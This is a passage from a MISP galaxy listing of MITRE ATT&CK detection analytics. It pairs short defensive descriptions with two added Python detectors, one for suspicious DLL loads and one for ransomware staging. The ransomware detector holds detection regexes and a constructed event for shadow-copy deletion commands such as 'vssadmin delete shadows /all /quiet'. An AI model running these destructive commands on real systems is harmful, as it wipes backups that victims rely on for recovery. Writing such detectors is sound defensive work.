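    temp_public = unc or any(m in p for m in TEMP_PUBLIC_MARKERS)
    flags = []
    if temp_public or "\\users\\" in p:
        flags.append("user_writable_path")
    if temp_public:
        flags.append("temp_public_or_unc")
    return flags


def _ts(e):
    return datetime.fromisoformat(e["ts"])


def analyze(events, window_s=300, alert_at=3):
    """Score each ImageLoad: +1 user-writable, +1 Temp/Public/UNC, +2 unsigned or
    invalid signature, +1 DLL written within the window, +1 loaded by
    rundll32/regsvr32, +1 loading process connected outbound within the window."""
    writes = [e for e in events if e["type"] == "FileCreate"]
    conns = [e for e in events if e["type"] == "NetworkConnect"]
    weights = {"unsigned_or_invalid": 2}
    findings = []
    for e in events:
        if e["type"] != "ImageLoad":
            continue
        t, dll, win = _ts(e), norm(e["loaded"]), timedelta(seconds=window_s)
        reasons = path_flags(e["loaded"])
        if not e.get("signed") or e.get("signature_status", "").lower() != "valid":
            reasons.append("unsigned_or_invalid")
        if any(norm(w["target"]) == dll and t - win <= _ts(w) <= t for w in writes):
            reasons.append("written_recently")
        if ntpath.basename(norm(e["image"])) in LOADER_LOLBINS:
            reasons.append("loaded_by_rundll32_or_regsvr32")
        if any(c["pid"] == e["pid"] and t <= _ts(c) <= t + win for c in conns):
            reasons.append("outbound_connection")
        score = sum(weights.get(r, 1) for r in reasons)
        if score >= alert_at:
            findings.append({"pid": e["pid"], "image": e["image"], "loaded": e["loaded"],
                             "score": score, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyze(EVENTS):
        print(f)
```

Two things the sample data is built to show: kernel32.dll loaded by the same process that later beacons scores only 1, because the outbound connection is attributed to every module load and must not alert by itself; and a signed DLL under a user profile (the editor's libgit.dll) scores 1 for the path alone, which is the right noise level for per-user installs of legitimate software.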

Internal MISP references

UUID cc5f309c-6eb0-4f96-ba1a-0f4fd3bc1b79 which can be used as unique global reference for Analytic 0052 - AN0052 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0052
mitre_platforms ['Windows']

Analytic 2006 - AN2006

Once adversaries have provisioned software on a compromised server (ex: for use as a command and control server), internet scans may reveal servers that adversaries have compromised. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.

Internal MISP references

UUID 0fc0c7ce-e56d-4f3f-ab91-903861124816 which can be used as unique global reference for Analytic 2006 - AN2006 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2006
mitre_platforms ['PRE']

Analytic 0602 - AN0602

High-frequency file write operations using uncommon extensions, followed by ransom note creation, registry tampering, or shadow copy deletion. Often uses CLI tools like vssadmin, wbadmin, cipher, or PowerShell.
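An added example (not MITRE's code) scoring the three signals above per process: a burst of writes with uncommon extensions inside a sliding window, a ransom-note file name, and shadow-copy or recovery-deletion commands attributed to the parent that spawned them. Events are constructed; the extension baseline, window, burst threshold and weights are assumptions. The compiler process is included to show why a burst alone should not alert.

```python
"""Ransomware staging: burst of writes with uncommon extensions, ransom-note
creation and shadow-copy deletion, scored per process (added example; not part
of the MITRE analytic). Events are constructed; the extension baseline,
window and thresholds are assumptions to tune per environment."""
import ntpath
import re
from collections import defaultdict

COMMON_EXT = {".docx", ".xlsx", ".pptx", ".pdf", ".txt", ".csv", ".jpg", ".png", ".zip", ".log", ".tmp", ".json"}
RANSOM_NOTE = re.compile(r"(readme|recover|decrypt|how[_ -]?to|restore|unlock).*\.(txt|hta|html)$", re.I)
SHADOW_DELETION = [
    re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I),
    re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I),
    re.compile(r"wbadmin(\.exe)?\s+delete\s+(catalog|systemstatebackup)", re.I),
    re.compile(r"bcdedit(\.exe)?\s.*(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)", re.I),
    re.compile(r"Win32_ShadowCopy.*\.Delete\(", re.I),
]
WEIGHTS = {"burst_uncommon_ext": 1, "ransom_note": 1, "shadow_copy_deletion": 2}


def _writes(pid, image, start, count, step, pattern):
    """Constructed file-write events: count writes, `step` seconds apart, paths from pattern."""
    return [{"ts": start + i * step, "pid": pid, "image": image, "type": "write", "path": pattern.format(i)}
            for i in range(count)]


T0 = 1_728_561_600.0   # constructed epoch base
EVENTS = (
    _writes(7700, "C:\\Users\\alice\\AppData\\Roaming\\svchost.exe", T0, 40, 0.25,
            "C:\\Users\\alice\\Documents\\report{}.docx.lockd")
    + [{"ts": T0 + 11, "pid": 7700, "image": "C:\\Users\\alice\\AppData\\Roaming\\svchost.exe", "type": "write",
        "path": "C:\\Users\\alice\\Documents\\README_RECOVER_FILES.txt"},
       {"ts": T0 + 12, "pid": 7710, "ppid": 7700, "type": "proc", "cmdline": "vssadmin.exe delete shadows /all /quiet"},
       {"ts": T0 + 13, "pid": 7711, "ppid": 7700, "type": "proc", "cmdline": "cmd.exe /c wmic shadowcopy delete"}]
    + _writes(8800, "C:\\BuildTools\\bin\\cl.exe", T0 + 600, 30, 0.1, "C:\\src\\obj\\unit{}.obj")   # compiler: burst only
    + _writes(9900, "C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe", T0 + 900, 40, 0.1,
              "C:\\Users\\alice\\OneDrive\\Docs\\file{}.docx")                                    # common extension
)


def max_in_window(times, window_s):
    """Largest number of timestamps falling in any window_s-wide interval (two pointers)."""
    times = sorted(times)
    best = left = 0
    for right, t in enumerate(times):
        while t - times[left] > window_s:
            left += 1
        best = max(best, right - left + 1)
    return best


def detect(events, window_s=10.0, burst_min=20, alert_at=2):
    signals = defaultdict(set)
    uncommon_times = defaultdict(list)
    for e in events:
        if e["type"] in ("write", "rename"):
            name = ntpath.basename(e["path"])
            if ntpath.splitext(name)[1].lower() not in COMMON_EXT:
                uncommon_times[e["pid"]].append(e["ts"])
            if RANSOM_NOTE.search(name):
                signals[e["pid"]].add("ransom_note")
        elif e["type"] == "proc" and any(rx.search(e["cmdline"]) for rx in SHADOW_DELETION):
            # Attribute to the parent: the encryptor usually spawns cmd/vssadmin itself.
            signals[e.get("ppid", e["pid"])].add("shadow_copy_deletion")
    for pid, times in uncommon_times.items():
        if max_in_window(times, window_s) >= burst_min:
            signals[pid].add("burst_uncommon_ext")
    alerts = {}
    for pid, sigs in signals.items():
        score = sum(WEIGHTS[s] for s in sigs)
        if score >= alert_at:
            alerts[pid] = {"score": score, "signals": sorted(sigs)}
    return alerts


if __name__ == "__main__":
    print(detect(EVENTS))
```

Shadow-copy deletion carries weight 2 on its own because almost nothing legitimate runs `vssadmin delete shadows /all /quiet`; the write burst is weight 1 because compilers, backup agents and sync clients produce identical rates, so it only confirms. The extension baseline should be learned from the estate rather than hard-coded as here.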

Internal MISP references

UUID 1155df11-eee4-4fdf-a354-15eda0e90d4c which can be used as unique global reference for Analytic 0602 - AN0602 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0602
mitre_platforms ['Windows']

Analytic 0620 - AN0620

Processes accessing ALSA/PulseAudio devices or executing audio capture binaries like 'arecord', followed by file creation or suspicious child process spawning.

Internal MISP references

UUID 3ac9b4c2-9137-4d20-9619-01029d656874 which can be used as unique global reference for Analytic 0620 - AN0620 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0620
mitre_platforms ['Linux']

Analytic 0026 - AN0026

Correlates launchd plist modifications with subsequent unauthorized script execution or anomalous parent-child process trees involving user agents.

Internal MISP references

UUID 636b1cca-1fc4-4909-ac33-c2b2a7d69e02 which can be used as unique global reference for Analytic 0026 - AN0026 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0026
mitre_platforms ['macOS']

Analytic 0260 - AN0260

Detects creation or alteration of LaunchAgents or LaunchDaemons with corresponding plist modification followed by execution of associated binaries.

Internal MISP references

UUID 8cbda989-39e6-4f9e-8e23-213f92b3479d which can be used as unique global reference for Analytic 0260 - AN0260 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0260
mitre_platforms ['macOS']

Analytic 0206 - AN0206

Execution of AppleScript or Automator services launching ssh -L, socat, or launchctl items that dynamically reroute traffic from one Mac endpoint to another. LaunchAgents used to establish permanent internal tunnels.

Internal MISP references

UUID c62026a7-3332-489f-bb86-30626c1b3cc8 which can be used as unique global reference for Analytic 0206 - AN0206 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0206
mitre_platforms ['macOS']

Analytic 0062 - AN0062

Adversary executes systemctl or service stop targeting high-value services (e.g., mysql, sshd), possibly followed by rm or shred against data stores. Behavioral chain: sudo/su usage + stop command + /var/log/messages or syslog entries + file access/delete.

Internal MISP references

UUID ea793457-89e6-47d2-8ae1-7fd2bd814f82 which can be used as unique global reference for Analytic 0062 - AN0062 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0062
mitre_platforms ['Linux']

Analytic 0027 - AN0027

Monitors cloud function creation triggered by specific audit log events (e.g., IAM changes, object creation), followed by anomalous behavior from new service accounts.

Internal MISP references

UUID 0fb1d87b-e993-447e-8a2f-e9d42f6859c0 which can be used as unique global reference for Analytic 0027 - AN0027 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0027
mitre_platforms ['IaaS']

Analytic 2007 - AN2007

Consider analyzing code signing certificates for features that may be associated with the adversary and/or their developers, such as the thumbprint, algorithm used, validity period, common name, and certificate authority. Malware repositories can also be used to identify additional samples associated with the adversary and identify patterns an adversary has used in procuring code signing certificates. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as Code Signing or Install Root Certificate.

Internal MISP references

UUID 23b9c988-be01-4092-b9c4-0ddec8d58891 which can be used as unique global reference for Analytic 2007 - AN2007 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2007
mitre_platforms ['PRE']

Analytic 0702 - AN0702

Monitor for anomalies in transmitted data streams, including mismatched file integrity checks, API interception, or man-in-the-middle modifications. Detect unexpected use of APIs that handle network I/O where transmitted data integrity could be manipulated.

Internal MISP references

UUID 4cf44d48-1a0f-45a4-9a25-8bee9677ab52 which can be used as unique global reference for Analytic 0702 - AN0702 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0702
mitre_platforms ['Windows']

Analytic 0720 - AN0720

On Linux systems, forged credentials may be injected into browser session files, curl/wget headers, or token caches in memory. Detection can leverage auditd to track processes accessing sensitive files (~/.mozilla, ~/.config/chromium, ~/.aws/credentials) and correlate with suspicious outbound connections.

Internal MISP references

UUID 789849fe-7e94-4fd0-904b-02f8c9c0a696 which can be used as unique global reference for Analytic 0720 - AN0720 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0720
mitre_platforms ['Linux']

Analytic 0072 - AN0072

Abuse of Linux Electron binaries by modifying app.asar or config JS files and spawning unexpected child processes (bash, curl, python).

Internal MISP references

UUID 8129e7b8-eaa1-4459-ba70-ebf6d68ca16c which can be used as unique global reference for Analytic 0072 - AN0072 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0072
mitre_platforms ['Linux']

Analytic 0207 - AN0207

ESXi shell execution of tools/scripts (nc, socat, perl) relaying network traffic to other internal hosts, especially when initiated by unauthorized users or VMs.

Internal MISP references

UUID c1fd84b0-953d-463b-a293-3d6aa81e4589 which can be used as unique global reference for Analytic 0207 - AN0207 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0207
mitre_platforms ['ESXi']

Analytic 0270 - AN0270

Role escalation (e.g., Editor → Owner) in cloud collaboration tools (Google Workspace, O365) or file sharing apps to maintain elevated access.

Internal MISP references

UUID eb4a55f0-eff2-40f8-912e-43ba7e34603c which can be used as unique global reference for Analytic 0270 - AN0270 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0270
mitre_platforms ['SaaS']

Analytic 0082 - AN0082

Suspicious long-lived or high-throughput connections by non-Apple signed apps or processes not commonly associated with network uploads. Detect background processes using open sockets for data egress.

Internal MISP references

UUID 35a5d72b-6c69-498a-9118-14cd6c85a57a which can be used as unique global reference for Analytic 0082 - AN0082 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0082
mitre_platforms ['macOS']

Analytic 0208 - AN0208

Configuration of internal NAT or proxy rules that redirect traffic between client segments internally (e.g., site-to-site port forwarding). Often used to relay internal beaconing or move traffic laterally through trust zones.

Internal MISP references

UUID 42ba4dcf-0354-4d70-8c29-d0c3a8c90c23 which can be used as unique global reference for Analytic 0208 - AN0208 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0208
mitre_platforms ['Network Devices']

Analytic 2008 - AN2008

Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: Phishing). Monitor and analyze traffic patterns and packet inspection associated with protocol(s) that do not follow the expected protocol standards and traffic flows (e.g., extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax or structure). Consider correlation with process monitoring and command-line data to detect anomalous process execution and command-line arguments associated with those traffic patterns (e.g., monitor for use of files that do not normally initiate connections for the respective protocol(s)).

Internal MISP references

UUID 44001c2d-9832-4b2d-b3ac-a25cea93e03f which can be used as unique global reference for Analytic 2008 - AN2008 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2008
mitre_platforms ['PRE']

Analytic 0280 - AN0280

Detects Lua script execution via native or 3rd party interpreters, chained with unsigned binaries or unexpected parent lineage.

Internal MISP references

UUID 4b53b71f-16b4-483b-b64a-eacf6c9db077 which can be used as unique global reference for Analytic 0280 - AN0280 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0280
mitre_platforms ['macOS']

Analytic 0820 - AN0820

User opens a downloaded document/installer leading to EndpointSecurity file create in ~/Downloads or ~/Library paths then an exec of a suspicious utility (osascript, bash/zsh, curl, chmod, open with -a Terminal). Correlates File Creation with subsequent process exec and, optionally, quarantine/LSQuarantine events.

Internal MISP references

UUID 5becf65d-da9f-46e1-8edc-eea05c9dc6cb which can be used as unique global reference for Analytic 0820 - AN0820 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0820
mitre_platforms ['macOS']

Analytic 0802 - AN0802

Disabling or modifying sign-in or audit log collection for user activities. Defender view: policy or configuration updates removing logging coverage for critical accounts.

Internal MISP references

UUID 8e0f5333-9fc0-4f03-ae12-cf98903e08ea which can be used as unique global reference for Analytic 0802 - AN0802 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0802
mitre_platforms ['Identity Provider']

Analytic 0028 - AN0028

Correlates Power Automate or similar logic app workflows triggered by SaaS file uploads or email rules with data forwarding or anomalous access patterns.

Internal MISP references

UUID 982100e1-6d38-4d0e-b36d-7e2d2cf5a424 which can be used as unique global reference for Analytic 0028 - AN0028 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0028
mitre_platforms ['SaaS']

Analytic 0209 - AN0209

Detects execution of VB-based scripts or macros (VBS/VBA/VBScript) through cscript.exe/wscript.exe, Office-based process chains, or HTA usage. Focuses on chained behavior: Office or HTML container spawns script host > script host spawns PowerShell, network connections, or process injection.

Internal MISP references

UUID 0fe7a1db-759d-4d27-8ef1-a71509643594 which can be used as unique global reference for Analytic 0209 - AN0209 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0209
mitre_platforms ['Windows']

Analytic 0902 - AN0902

Adversaries leverage M365 or Google Workspace APIs to create users, service accounts, or guest accounts. Follow-on behaviors include login activity, role escalation, or service principal token generation.

Internal MISP references

UUID 53872bd3-7e5e-4573-ae07-6304bf7e49af which can be used as unique global reference for Analytic 0902 - AN0902 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0902
mitre_platforms ['Office Suite']

Analytic 0920 - AN0920

Detects files or processes where execution results in frequent re-creation or modification of ELF binaries or interpreter scripts, often using chmod + execve with abnormal entropy.

Internal MISP references

UUID 6ed3efbf-c060-4c7f-8d8b-0e93f65a0790 which can be used as unique global reference for Analytic 0920 - AN0920 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0920
mitre_platforms ['Linux']

Analytic 0290 - AN0290

Detects suspicious configuration changes in IdP authentication flows such as enabling reversible password encryption, MFA bypass, or policy weakening. Correlates policy modification events with unusual administrative activity.

Internal MISP references

UUID bbaa7fb3-974c-41ef-9cec-a0789a66445c which can be used as unique global reference for Analytic 0290 - AN0290 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0290
mitre_platforms ['Identity Provider']

Analytic 0092 - AN0092

Creation of files or directories with a leading '.' in privileged directories (/etc, /var, /usr/bin). Defender view: monitoring auditd logs for file creations where name begins with '.' and correlated with unusual user/process context.

Internal MISP references

UUID c4108797-7eb4-4ef8-8dee-c2db00695ab4 which can be used as unique global reference for Analytic 0092 - AN0092 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0092
mitre_platforms ['Linux']

Analytic 2009 - AN2009

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID cf66582f-6fa3-4d3b-a322-95c2af08b49b which can be used as unique global reference for Analytic 2009 - AN2009 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2009
mitre_platforms ['PRE']

Analytic 0029 - AN0029

Detects macros or VBA triggers set to execute on document open or close events, often correlating with embedded payloads or C2 traffic shortly after execution.

Internal MISP references

UUID d8e18081-2670-4a88-9246-59a1dc52c51c which can be used as unique global reference for Analytic 0029 - AN0029 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0029
mitre_platforms ['Office Suite']

Analytic 0330 - AN0330

Ties inbound access to exposed services (ARD/VNC 5900, SSH 22, ScreenSharing, web services) with process crashes in unified logs and abnormal child processes spawned under those services (e.g., bash, curl) to indicate exploitation.

Internal MISP references

UUID 32ef36a3-3112-40a1-84d0-323b7b86cb5b which can be used as unique global reference for Analytic 0330 - AN0330 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0330
mitre_platforms ['macOS']

Analytic 0303 - AN0303

Custom scripts or processes encode outbound traffic using gzip, Base64, or hex prior to exfiltration via curl, wget, or custom sockets. Encoding typically occurs before or during outbound connections from non-network daemons.

Internal MISP references

UUID d32cc2a4-60ed-4761-809e-a59cde2a1881 which can be used as unique global reference for Analytic 0303 - AN0303 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0303
mitre_platforms ['Linux']

Analytic 0033 - AN0033

Anomalous traffic from ESXi host management daemons (like hostd or vpxa) embedding non-standard payloads in management protocols (e.g., HTTPS) or beaconing behavior.

Internal MISP references

UUID d3bad85b-9e86-4de8-9e4a-1666133af782 which can be used as unique global reference for Analytic 0033 - AN0033 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0033
mitre_platforms ['ESXi']

Analytic 0034 - AN0034

Discrepancies between VBA source code and p-code inside Office documents. Defender perspective: anomalies in file metadata streams, execution of Office processes loading macros without source code consistency, and script execution with no corresponding source metadata.

Internal MISP references

UUID 0ea214f3-5d66-4170-b33d-58a6577bb074 which can be used as unique global reference for Analytic 0034 - AN0034 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0034
mitre_platforms ['Windows']

Analytic 0304 - AN0304

Processes use built-in encoding utilities (e.g., base64, xxd, or plutil) to encode file contents followed by HTTP/HTTPS transfer via curl or custom applications.

Internal MISP references

UUID 2bf1ce64-970b-4d0d-bf5f-a854fc6d7235 which can be used as unique global reference for Analytic 0304 - AN0304 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0304
mitre_platforms ['macOS']

Analytic 0403 - AN0403

ESXi daemons (hostd, vpxa) unexpectedly using symmetric encryption routines for external connections. Defender identifies logs of service traffic with encrypted payloads inconsistent with VMware management baselines.

Internal MISP references

UUID 50102ced-9c8f-47e6-b438-63b2a7fe983d which can be used as unique global reference for Analytic 0403 - AN0403 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0403
mitre_platforms ['ESXi']

Analytic 0340 - AN0340

Creation or modification of Login Items using AppleScript or Service Management Framework. Detection focuses on file creation/modification of backgrounditems.btm, new executables in Contents/Library/LoginItems/, use of SMLoginItemSetEnabled API, or suspicious processes triggered post-login without user interaction. Behavioral pivot includes anomalous AppleEvents, suspicious parent-child process pairs, and login-triggered execution chains.

Internal MISP references

UUID 89e3509c-d732-4826-ac78-baea8fbf0834 which can be used as unique global reference for Analytic 0340 - AN0340 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0340
mitre_platforms ['macOS']

Analytic 0430 - AN0430

Untrusted or unusual process/script (cmd.exe, powershell.exe, w32tm.exe, net.exe, custom binaries) queries system time/timezone (e.g., w32tm /tz, net time \\host, Get-TimeZone, GetTickCount API) and (optionally) is followed within a short window by time-based scheduling or conditional execution (e.g., schtasks /create, at.exe, PowerShell Start-Sleep with large values).

Internal MISP references

UUID bd34c127-9956-4616-999d-229f30512f74 which can be used as unique global reference for Analytic 0430 - AN0430 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0430
mitre_platforms ['Windows']

Analytic 0043 - AN0043

Detects virtual disk expansion or file copy operations to cloud buckets or mounted volumes from isolated instances.

Internal MISP references

UUID e622500c-4217-466c-955c-82ef3217653a which can be used as unique global reference for Analytic 0043 - AN0043 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0043
mitre_platforms ['IaaS']

Analytic 0053 - AN0053

A process loads a shared object (.so) via dlopen/LD_PRELOAD/open from non-standard or temporary locations (e.g., /tmp, /dev/shm), especially shortly after that .so is written or fetched, or linked via manipulated environment variables (LD_PRELOAD/LD_LIBRARY_PATH).

Internal MISP references

UUID 01c969ef-7057-44bd-bced-9b64a98234ec which can be used as unique global reference for Analytic 0053 - AN0053 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0053
mitre_platforms ['Linux']

Analytic 0530 - AN0530

Compromised service account tokens mounted inside containers and reused for external API calls or lateral movement across services.

Internal MISP references

UUID 03216652-ada9-4c1e-88c4-923c2cb60614 which can be used as unique global reference for Analytic 0530 - AN0530 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0530
mitre_platforms ['Containers']

Analytic 0503 - AN0503

Malicious HTML or script is rendered as a Home Page for a specific Outlook folder. Outlook accesses that folder, loads remote content, and executes embedded JavaScript or ActiveX/COM logic resulting in unauthorized actions or local execution.

Internal MISP references

UUID 616755c6-e83d-46ce-ad76-ac706074a575 which can be used as unique global reference for Analytic 0503 - AN0503 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0503
mitre_platforms ['Office Suite']

Analytic 0350 - AN0350

Adversary attempts to gain persistence by modifying ~/.ssh/authorized_keys via shell, text editor, echo or redirected output.

Internal MISP references

UUID 72dd4fd9-b6cb-4704-b845-0632fe224995 which can be used as unique global reference for Analytic 0350 - AN0350 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0350
mitre_platforms ['Linux']

Analytic 0305 - AN0305

ESXi daemons (e.g., hostd, vpxa) are wrapped or impersonated to send large outbound traffic using gzip/Base64 encoding over SSH or HTTP. These actions follow suspicious logins or shell access.

Internal MISP references

UUID cb428c22-0a5a-44c9-ae63-6b1bedb34fee which can be used as unique global reference for Analytic 0305 - AN0305 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0305
mitre_platforms ['ESXi']

Analytic 0035 - AN0035

Execution of Wine or LibreOffice macros with inconsistent VBA metadata. Defender perspective: file analysis showing p-code embedded without matching source streams.

Internal MISP references

UUID f9f7e5e7-edbf-442b-b4ea-d35455982ba8 which can be used as unique global reference for Analytic 0035 - AN0035 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0035
mitre_platforms ['Linux']

Analytic 0036 - AN0036

Opening of Office files where VBA source code appears benign or missing, but p-code remains active. Defender perspective: process execution of Office apps with macro execution lacking visible source components.

Internal MISP references

UUID 025e89c6-9383-48b5-b9f2-85ab31b6a7bb which can be used as unique global reference for Analytic 0036 - AN0036 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0036
mitre_platforms ['macOS']

Analytic 0306 - AN0306

Monitor for unexpected modifications of plist files in persistence or configuration directories (e.g., ~/Library/LaunchAgents, ~/Library/Preferences, /Library/LaunchDaemons). Detect when modifications are followed by execution of new or unexpected binaries. Track use of utilities such as defaults, plutil, or text editors making changes to Info.plist files. Correlate file modifications with subsequent process launches or service starts that reference the altered plist.

Internal MISP references

UUID 481966ed-de78-42e4-9c51-c69281a21650 which can be used as unique global reference for Analytic 0306 - AN0306 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0306
mitre_platforms ['macOS']

Analytic 0630 - AN0630

Detects behavior where files with non-executable or misleading extensions (e.g., .jpg, .txt) are created or modified but subsequently executed as binaries based on internal file headers or abnormal parent process lineage. This includes identifying polyglot files or malformed magic bytes indicative of masquerading attempts.

Internal MISP references

UUID 557e1f6e-5eeb-46ea-bcd2-5d858eea314c which can be used as unique global reference for Analytic 0630 - AN0630 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0630
mitre_platforms ['Windows']

Analytic 0063 - AN0063

Use of launchctl to stop services or kill critical background processes (e.g., securityd, com.apple.*), typically followed by command-line tools like rm or diskutil. Behavioral chain: Terminal or remote shell + launchctl bootout/disable + process termination + follow-on modification.

Internal MISP references

UUID 86ea7b9c-c017-463d-b5d5-377f6dbfae1e which can be used as unique global reference for Analytic 0063 - AN0063 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0063
mitre_platforms ['macOS']

Analytic 0603 - AN0603

Encryption via custom or open-source tools (e.g., openssl, gpg, aescrypt) recursively targeting user or system directories. Also includes overwrite of existing data and ransom note drops.

Internal MISP references

UUID b2f444b1-e434-40e1-9501-6b66a05a0201 which can be used as unique global reference for Analytic 0603 - AN0603 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0603
mitre_platforms ['Linux']

Analytic 0360 - AN0360

Suspicious use of scripting parameters or registry edits to hide process windows (e.g., powershell.exe -WindowStyle Hidden, or registry modifications pushing window positions off screen). Defender view: correlation of hidden execution with anomalous process lineage or hVNC-like CreateDesktop API calls.

Internal MISP references

UUID b3bad14e-39a8-4e90-b3e3-46974fd9c2bd which can be used as unique global reference for Analytic 0360 - AN0360 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0360
mitre_platforms ['Windows']

Analytic 0703 - AN0703

Detect alterations of transmitted data via monitoring syscalls (send, recv, write) or middleware interception. Identify mismatched file hashes when compared at origin vs. destination. Watch for anomalous activity from processes interacting with secure transmission services (e.g., OpenSSL, scp).

Internal MISP references

UUID 500ae9f9-c6c2-4160-ac03-072d963eba63 which can be used as unique global reference for Analytic 0703 - AN0703 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0703
mitre_platforms ['Linux']

Analytic 0370 - AN0370

Detects access to cloud APIs or CLI tools to move or sync files from sensitive buckets to external endpoints using protocols like HTTPS or S3 APIs.

Internal MISP references

UUID 8dbd751b-a2cf-418a-b409-daae78a250f8 which can be used as unique global reference for Analytic 0370 - AN0370 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0370
mitre_platforms ['IaaS']

Analytic 0037 - AN0037

Access to browser artifact locations (e.g., Chrome, Edge, Firefox) by processes like PowerShell, cmd.exe, or unknown tools, followed by file reads, decoding, or export operations indicating enumeration of bookmarks, autofill, or history databases.

Internal MISP references

UUID c233a50c-0fdb-412b-85f6-8ff71a3539b9 which can be used as unique global reference for Analytic 0037 - AN0037 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0037
mitre_platforms ['Windows']

Analytic 0307 - AN0307

Correlation of chmod operations setting setuid/setgid bits followed by privileged process execution (EUID != UID), especially from user-writable or abnormal paths.

Internal MISP references

UUID c7d513f4-5113-4031-8125-7f145128c2e1 which can be used as unique global reference for Analytic 0307 - AN0307 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0307
mitre_platforms ['Linux']

Analytic 0730 - AN0730

Use unified logs to detect unusual DNS responses correlated with subsequent connections to calculated or non-standard ports. Monitor non-browser apps making repeated outbound connections that deviate from expected patterns.

Internal MISP references

UUID e95ed4e2-d6bc-4a6f-acbc-bdbfcbaca158 which can be used as unique global reference for Analytic 0730 - AN0730 in MISP communities and other software using the MISP galaxy

External references
